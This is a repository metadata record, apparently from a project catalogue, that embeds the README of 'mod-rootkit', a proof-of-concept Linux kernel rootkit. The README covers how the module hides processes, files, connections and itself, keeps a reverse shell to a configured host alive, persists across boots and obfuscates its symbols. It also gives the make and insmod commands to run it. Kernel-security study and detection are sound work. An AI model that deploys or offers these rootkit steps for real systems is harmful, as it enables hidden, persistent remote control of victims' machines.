{"id":26629939,"url":"https://github.com/flashnuke/mod-rootkit","last_synced_at":"2025-07-24T05:36:02.417Z","repository":{"id":283645029,"uuid":"947360677","full_name":"flashnuke/mod-rootkit","owner":"flashnuke","description":"Kernel-space x86_64 Linux rootkit leveraging kprobes and ftrace for syscall hooking (hiding entries and reverse shell backdoor)","archived":false,"fork":false,"pushed_at":"2025-04-07T17:01:57.000Z","size":165,"stargazers_count":7,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-07T17:37:28.384Z","etag":null,"topics":["backdoor","cybersecurity","ethical-hacking","hacking","kernel","kernel-rootkit","linux","linux-kernel","linux-kernel-module","linux-rootkit","lkm","lkm-root","malware","mod-rootkit","pentest","pentesting","reverse-shell","rootkit","rootkits","security"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/flashnuke.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-03-12T15:08:38.000Z","updated_at":"2025-04-07T17:01:55.000Z","dependencies_parsed_at":"2025-04-07T17:29:10.701Z","dependency_job_id":"04de049b-1927-4c92-906b-b8a5aa168610","html_url":"https://github.com/flashnuke/mod-rootkit","commit_stats":null,"previous_names":["flashnuke/mod-rootkit"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/flashnuke/mod-rootkit","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/flashnuke%2Fmod-rootkit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/flashnuke%2Fmod-rootkit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/flashnuke%2Fmod-rootkit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/flashnuke%2Fmod-rootkit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/flashnuke","download_url":"https://codeload.github.com/flashnuke/mod-rootkit/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/flashnuke%2Fmod-rootkit/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":266796873,"owners_count":23985487,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-07-24T02:00:09.469Z","response_time":99,"last_error":null,"robots_txt_status":null,"robots_txt_updated_at":null,"robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","cybersecurity","ethical-hacking","hacking","kernel","kernel-rootkit","linux","linux-kernel","linux-kernel-module","linux-rootkit","lkm","lkm-root","malware","mod-rootkit","pentest","pentesting","reverse-shell","rootkit","rootkits","security"],"created_at":"2025-03-24T13:16:19.304Z","updated_at":"2025-07-24T05:36:02.408Z","avatar_url":"https://github.com/flashnuke.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"```\n███╗   ███╗ ██████╗ ██████╗       ██████╗  ██████╗  ██████╗ ████████╗██╗  ██╗██╗████████╗\n████╗ ████║██╔═══██╗██╔══██╗      ██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝██║ ██╔╝██║╚══██╔══╝\n██╔████╔██║██║   ██║██║  ██║█████╗██████╔╝██║   ██║██║   ██║   ██║   █████╔╝ ██║   ██║   \n██║╚██╔╝██║██║   ██║██║  ██║╚════╝██╔══██╗██║   ██║██║   ██║   ██║   ██╔═██╗ ██║   ██║   \n██║ ╚═╝ ██║╚██████╔╝██████╔╝      ██║  ██║╚██████╔╝╚██████╔╝   ██║   ██║  ██╗██║   ██║   \n╚═╝     ╚═╝ ╚═════╝ ╚═════╝       ╚═╝  ╚═╝ ╚═════╝  ╚═════╝    ╚═╝   ╚═╝  ╚═╝╚═╝   ╚═╝   \n                                                                                                                                               \n```\n\n\nA simple proof-of-concept Linux Kernel Rootkit module designed to hide processes, files, network connections and itself from userland visibility, and offers the ability the establish a reverse shell, for modern kernel versions.\n\nThis module operates at the kernel level, allowing it to intercept system calls directly, enabling a higher degree of stealth compared to user-space techniques (i.e `LD_PRELOAD`).\n\nUnlike traditional rootkits that rely on direct syscall table hooking or exported symbols like kallsyms_lookup_name(), this implementation leverages kprobes and ftrace (credit goes to [xcellerator](https://github.com/xcellerator/linux_kernel_hacking) for this method) — for greater stealth and compatibility. It avoids deprecated or removed interfaces, ensuring operability on recent kernel versions (e.g., 5.7+ where kallsyms_lookup_name() is no longer exported).\n\n## Overview\n\n`mod-rootkit` is a Loadable Kernel Module (LKM) that demonstrates basic rootkit techniques in Linux. Once inserted into the kernel, it provides stealth capabilities by intercepting and modifying system behavior to:\n\n- **Process Hiding** – Hide any process based on configured keywords (that appear in the cmdline)\n- **File \u0026 Directory Hiding** – Hide files and folders based on configured keywords\n- **Network connection hiding** – Hide files and folders based on configured IP addresses or ports\n- **Module Hiding** – Hides itself from kernel module listings\n\n### Demo - Hiding names and processes\n```c\nmake STRINGS_EXCLUDES=\"SOME_KEYWORD,hidden\"\nsudo insmod mod_rootkit.ko\n```\n\u003cimg width=\"437\" alt=\"image\" src=\"https://github.com/user-attachments/assets/855ae402-1cbd-4f5c-97d4-c83573f18a75\" /\u003e\n\n### Demo - Hiding network connections and a hidden reverse shell\n```c\nmake RSHELL_HOST=127.0.0.1 RSHELL_PORT=9001 NET_EXCLUDES=9001\nsudo insmod mod_rootkit.ko\n```\n\u003cimg width=\"437\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c6fdb061-8fb6-4456-91a0-61037c303752\" /\u003e\n\n## Requirements\n\n- Linux system with kernel headers installed\n- GCC, make and kernel headers: `sudo apt update \u0026\u0026 sudo apt install -y build-essential linux-headers-$(uname -r) make gcc`\n- Root permissions\n- Kernel version - should work on any\n\nTested on x86_64 Linux only\n\n\n# Usage\n```bash\nsudo apt install -y build-essential linux-headers-$(uname -r) # install requirements\n\ngit clone https://github.com/flashnuke/mod-rootkit.git\ncd mod-rootkit\nmake STRING_EXCLUDES=\"SOME_FILENAME1,SOME_FILENAME2\" NET_EXCLUDES=\"127.0.0.1,2222\" RSHELL_HOST=192.168.1.1 RSHELL_PORT=9001 HIDE_MODULE=0\n# to add a reverse shell read params breakdown\nsudo make install\nmake clean\n```\n\n## Breakdown:\n\n### Building the Module\nTo compile the module:\n```bash\nmake STRING_EXCLUDES=\"SOME_FILENAME1,SOME_FILENAME2\" NET_EXCLUDES=\"127.0.0.1,2222\" HIDE_MODULE=0\n```\nYou can also set up a reverse shell:\n```bash\nmake RSHELL_HOST=192.168.1.1 RSHELL_PORT=9001 NET_EXCLUDES=9001 # NET_EXCLUDES is used to hide the connection, it's not mandatory\n```\n\n| Parameter        | Required? | Description                                                                 |\n|------------------|-----------|-----------------------------------------------------------------------------|\n| `STRING_EXCLUDES`| No        | Comma-separated list of strings to hide from `getdents` (e.g., file/process names) |\n| `NET_EXCLUDES`   | No        | Comma-separated list of IPs/ports to ignore or hide connections                   |\n| `HIDE_MODULE`    | No        | Set to `1` to auto-hide the module after load (hides from `lsmod`, etc.)  |\n| `MODULE_NAME`    | No        | Default is `mod_rootkit`, override to change the module name                |\n| `RSHELL_HOST`    | No        | IP address of the reverse shell host                |\n| `RSHELL_PORT`    | No        | Port address of the reverse shell host                |\n\n### Loading / removing the module manually\nTo load:\n```bash\nsudo insmod mod_rootkit.ko\n```\n\nTo remove:\n```bash\nsudo rmmod mod_rootkit\n```\n\n### Install the module (Auto-load on boot)\n```bash\nsudo make install\n```\nThis will register the module, create a boot-time autoload config and load the module immediately with `modprobe`\n\n### Uninstall the module\n```bash\nsudo make uninstall\n```\nThis will attempt to unload the module from the running kernel and remove it from auto-load on boot\n\n### Clean build artifacts\n```bash\nmake clean\n```\nThis will remove all temporary build files\n\n### Additional usage notes\n\n* When hiding a process - make sure its cmdline contains a substr that is then passed via `STRING_EXCLUDES`, ie: running \"`./HIDEME.sh`\" and then passing `make ... STRING_EXCLUDES=HIDEME ...`\n* For every str inside the `*_EXCLUDES` params, it's enough for a partial match in order for an entry to be hidden (doesn't have to be a full match, i.e: `STRING_EXCLUDES=ABC` would hide entry `...ABCDE...`)\n* Setting `HIDE_MODULE=1` hides the module, use with caution as it's not trivial to remove it afterwards\n* `NET_EXCLUDES` example - `NET_EXCLUDES=127.0.0.1,12345` would exclude all connections to/from `127.0.0.1` and all connections to/from port `12345`\n* If reverse shell params are set, the module attempts to establish a reverse shell connection to the host every 10 seconds.\n\n### Obusfaction\n\nThe input parameters (exclusions, reverse shell params) are XOR'd and decrypted during runtime.\u003c/br\u003e\nThe module is compiled using special flags, and the `.ko` file is stripped as part of the make process.\u003c/br\u003e\nHowever, symbols cannot be completely stripped (due to the nature of `ftrace`) but can be obsufcated manually, using macros:\n```c\n// header file\n#define rshell_func z9qr_x1\nextern int z9qr_x1(void* data);\n...\n// src file\nint z9qr_x1(void* data) {...} // int rshell_func(void* data)\n```\n\n\n# Disclaimer\n\nThis project is provided **strictly for educational and ethical research** purposes.  \nInstalling or deploying rootkits on unauthorized systems is **illegal and unethical**.\n\nUse this project only in isolated lab environments, virtual machines, or test systems under your full control.\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflashnuke%2Fmod-rootkit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fflashnuke%2Fmod-rootkit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflashnuke%2Fmod-rootkit/lists"}